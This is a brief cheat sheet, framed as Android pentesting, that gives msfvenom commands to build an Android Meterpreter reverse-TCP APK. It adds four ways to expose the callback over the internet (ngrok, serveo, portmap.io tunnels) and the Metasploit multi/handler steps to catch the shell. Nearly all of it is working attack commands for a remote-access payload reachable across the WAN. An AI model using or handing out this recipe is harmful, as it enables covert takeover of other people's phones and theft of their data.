Metasploit For Android Pentesting LAN / WAN 4 METHODS Explained

Generating Payload

1. On localhost <127.0.0.1>

• msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 R >/root/Desktop/kapoor.apk

2. If Running Ngrok <ngrok.com>

• ./ngrok tcp <port>

• msfvenom -p android/meterpreter/reverse_tcp LHOST=$x.tcp.ngrok.io LPORT=Ngrok port R >/root/Desktop/kapoor.apk

3. If Running Serveo <serveo.net>

• ssh -R 7878:localhost:4444 serveo.net

• ssh -R remoteport:localhost:localport serveo.net

• msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=Serveo port R >/root/Desktop/kapoor.apk

4. If using PortMap  <portmap.io>

• msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.portmap.host LPORT= <postmap.io's port>R >/root/Desktop/kapoor.apk

• You Must Be Connected to OpenVPN Config File that Portmap.io Gave

Starting Listener

• use exploit/multi/handler

•  set payload android/meterpreter/reverse_tcp

• Show Options

• Set lhost your ip/0.0.0.0/localhost/xx.portmap.host

<hosts in these format - localhost/ngrok/serveo/portmap>

• Set lport <port used while geenerating payload>/<port forwarded to ngrok>/<lport in this case 4444>/<port given to portmap.io>

• Expoit

• You Can Test the payload in your mobile to see vulnerabilties